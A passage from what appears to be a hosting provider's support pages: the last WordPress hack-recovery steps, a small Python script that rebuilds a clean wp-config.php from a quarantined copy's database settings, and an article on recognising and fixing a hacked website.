  9. Now navigate on the server side to the /public_html/wp-content/themes directory, and drag the pinboard directory from the local computer to the server.
  10. You should now hopefully be able to pull up your website again, free of any malicious hacks.
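As an added example (not from the original article or from WordPress itself), here is a small Python script that carries out steps 4, 6 and 7 above without hand-editing: it copies only the DB_* values and the table prefix out of the quarantined wp-config.php into a clean wp-config-sample.php, so nothing else from the hacked copy is carried over. Both file contents and all database values below are constructed.

```python
import re

# Constructed sample of a quarantined wp-config.php (values invented). The trailing
# comment stands in for whatever injected code a hacked copy might carry.
QUARANTINED_WP_CONFIG = """<?php
define( 'DB_NAME', 'userna5_wp123' );
define( 'DB_USER', 'userna5_wpuser' );
define( 'DB_PASSWORD', 's3cret-pass' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
/* placeholder for injected code that must not be copied over */
"""

# Constructed excerpt of a fresh wp-config-sample.php as shipped with WordPress.
WP_CONFIG_SAMPLE = """<?php
define( 'DB_NAME', 'database_name_here' );
define( 'DB_USER', 'username_here' );
define( 'DB_PASSWORD', 'password_here' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""

DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"]([^'"]*)['"]""")

def extract_db_settings(quarantined_text):
    """Read only the four DB_* values and the table prefix from the quarantined
    file; everything else in it is treated as untrusted and ignored."""
    found = {k: v for k, v in DEFINE_RE.findall(quarantined_text) if k in DB_KEYS}
    missing = [k for k in DB_KEYS if k not in found]
    if missing:
        raise ValueError(f"quarantined wp-config.php is missing {missing}")
    m = PREFIX_RE.search(quarantined_text)
    found["table_prefix"] = m.group(1) if m else "wp_"
    return found

def build_wp_config(sample_text, settings):
    """Fill the extracted values into a clean wp-config-sample.php (step 6) and
    return the text to save as wp-config.php (step 7)."""
    def fill(m):
        key = m.group(1)
        return f"define( '{key}', '{settings[key]}' )" if key in settings else m.group(0)
    out = DEFINE_RE.sub(fill, sample_text)
    return PREFIX_RE.sub(lambda m: f"$table_prefix = '{settings['table_prefix']}'", out)

if __name__ == "__main__":
    print(build_wp_config(WP_CONFIG_SAMPLE, extract_db_settings(QUARANTINED_WP_CONFIG)))
```

On a real account, read the quarantined file and the fresh sample from disk, write the result to public_html/wp-config.php, and leave the quarantined copy untouched.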

Depending on the complexity of your WordPress site, you might also want to go in and reinstall any plugins that you had set up to get your site fully functional again. The steps above should at least get you to the point where you can log back into your WordPress administration panel and get your site back online for your visitors.

I Think My Website Has Been Hacked
https://www.inmotionhosting.com/support/website/i-think-my-website-has-been-hacked/
Mon, 19 Sep 2011 17:01:38 +0000

If you think your website has been hacked, it’s good to determine the nature of the hack as soon as possible. There are many different types of hacks: some are malicious, while others are just defacements of your actual web pages. We recommend that you regularly back up your website and store the backups on your local computer. If you ever have to restore your website, having those backups can be invaluable.

How Can I Tell if My Website Has Been Hacked?

Some hacks are quite apparent since they deface your page, while others are more subtle. Here are some common signs that your website has been compromised:

  • Your home page has changed. If you visit your website, and instead of seeing the page you have created you see something entirely different it’s likely that your page has been “defaced.” Normally, these types of hackers will have a “hacked by…” message displaying to take credit for the hack.
  • Your access to admin pages no longer exists. If you cannot access your admin section of your website, it’s possible the hacker has gained access to the administrator account or cPanel and altered the passwords.
  • You get a red Google Warning page. This is an indication that Google has scanned your website, and one of the Google bots has found some code that is known to be malicious. If this is the case, Google will display a red warning page.
  • Your computer’s anti-virus software warns you when you visit your website. This is a typical situation where your website is trying to install a trojan or another type of virus on your local computer.
  • A page will not load but it used to. If you haven’t changed anything on your website and it is now not loading this could be a sign of a hack. This is not a typical hack but usually indicates that the hacker has modified a database so it no longer functions as it should.

How Was My Website Hacked?

The most common methods of hacking a website are:

  • Compromised Password to:
    • cPanel
    • Website or CMS Software
    • FTP
  • Code Injection
  • Remote File Inclusion
  • Outdated Website Software, such as:
    • Plugins
    • Addons
    • Themes

If your password has been hacked or compromised, this will typically be a defacement type of hack. If you use a content management system, the hack was usually done by exploiting the software. It is important, when you use CMS software such as Joomla, WordPress, or OSCommerce, to keep the software up to date.

How Can I Fix My Hacked Website?

Each hack is different, so it is extremely difficult to suggest an exact method to resolve a hacked site. Here are some general methods for fixing a hacked website:

  • Change the passwords to your account. This is the best practice for any hack and the quickest way to limit access to the website and your account. You should change your WordPress, FTP, and cPanel passwords.
  • Update all programs used on your hosting account. If you use a third-party shopping cart or CMS, it’s important to keep that software up to date, because most updates exist to secure the software itself: as vulnerabilities are found, patches are released.
  • Update software on your local computer. Some programs, such as Flash, have vulnerabilities that allow hackers to access data on your computer. We’ve seen some hacks even designed to search around for saved FTP credentials.
  • Run a malware or virus scan on your local machine. It is possible that you have picked up a piece of malware or a virus that is copying your passwords.

For more information on fixing a hack, please see our article on recovering from a hack. Please see our Website Security article for more information on protecting your website.


Keeping your server secure is a full time job for any support staff. But that shouldn’t be the only focus. Read more about what makes InMotion one of the top hosting companies out there.
